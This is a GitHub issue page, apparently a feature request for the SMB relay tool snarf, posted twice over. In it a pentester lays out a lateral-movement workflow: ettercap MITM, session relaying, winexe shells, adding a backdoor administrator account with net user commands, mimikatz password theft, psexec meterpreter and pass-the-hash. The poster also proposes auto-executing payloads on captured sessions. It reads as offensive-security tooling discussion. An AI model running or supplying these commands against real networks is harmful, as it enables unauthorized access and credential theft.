You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
So this has been my workflow for the last two days
(yes, I'm on a live-fire pentest right now for the next 2 days and snarf has gotten me ALL OF THE SHELLS that I have right now):
ettercap MITM
run snarf
randomly try to expire, then nab sessions (copypasting hashes out of the UI as I go)
winexe -U x%x //127.0.0.1 cmd -> oh look! a shell!
hostname, ifconfig - where am I, who did I shell?
method A)
6) net user dirtyhacker dirtyhackerpw /add - net localgroup administrators dirtyhacker /add
7) smbclient -U x%x //127.0.0.1/C$ (sometimes it works, sometimes the session is on a server that won't let me hit C$)
method B)
6) net user add dirtyhacker blah blah blah
7) RDP in using the dirtyhacker creds, run mimikatz, steal passwords, then use metasploit to psexec meterpreter, and proceed from there
upload a payload (sometimes powershell, sometimes a custom exe) to lob a shell somewhere
continue outside of snarf
So it seems like the fastest way to do it would be to have a powershell or batch file script that you can define as the 'payload', and whenever a session is captured snarf copies and pastes the payload script into the session and attempts to execute it. One can assume the username in the session is the user, and if an LM hash is captured that can be sent in place of the password :D (pass the hash!)
Another consideration is that if a server is shelled (rather than a workstation) it may be prudent to walk through the listed available shares (I've normally used metasploit for this, but I think it can be done with another tool.. nbtstat maybe?). Presuming the user is on kali linux, this shoudlnt be too hard - and then walk through the available shares and try to connect to one until there is a success.
The text was updated successfully, but these errors were encountered:
So this has been my workflow for the last two days
(yes, I'm on a live-fire pentest right now for the next 2 days and snarf has gotten me ALL OF THE SHELLS that I have right now):
method A)
6) net user dirtyhacker dirtyhackerpw /add - net localgroup administrators dirtyhacker /add
7) smbclient -U x%x //127.0.0.1/C$ (sometimes it works, sometimes the session is on a server that won't let me hit C$)
method B)
6) net user add dirtyhacker blah blah blah
7) RDP in using the dirtyhacker creds, run mimikatz, steal passwords, then use metasploit to psexec meterpreter, and proceed from there
So it seems like the fastest way to do it would be to have a powershell or batch file script that you can define as the 'payload', and whenever a session is captured snarf copies and pastes the payload script into the session and attempts to execute it. One can assume the username in the session is the user, and if an LM hash is captured that can be sent in place of the password :D (pass the hash!)
Another consideration is that if a server is shelled (rather than a workstation) it may be prudent to walk through the listed available shares (I've normally used metasploit for this, but I think it can be done with another tool.. nbtstat maybe?). Presuming the user is on kali linux, this shoudlnt be too hard - and then walk through the available shares and try to connect to one until there is a success.
The text was updated successfully, but these errors were encountered: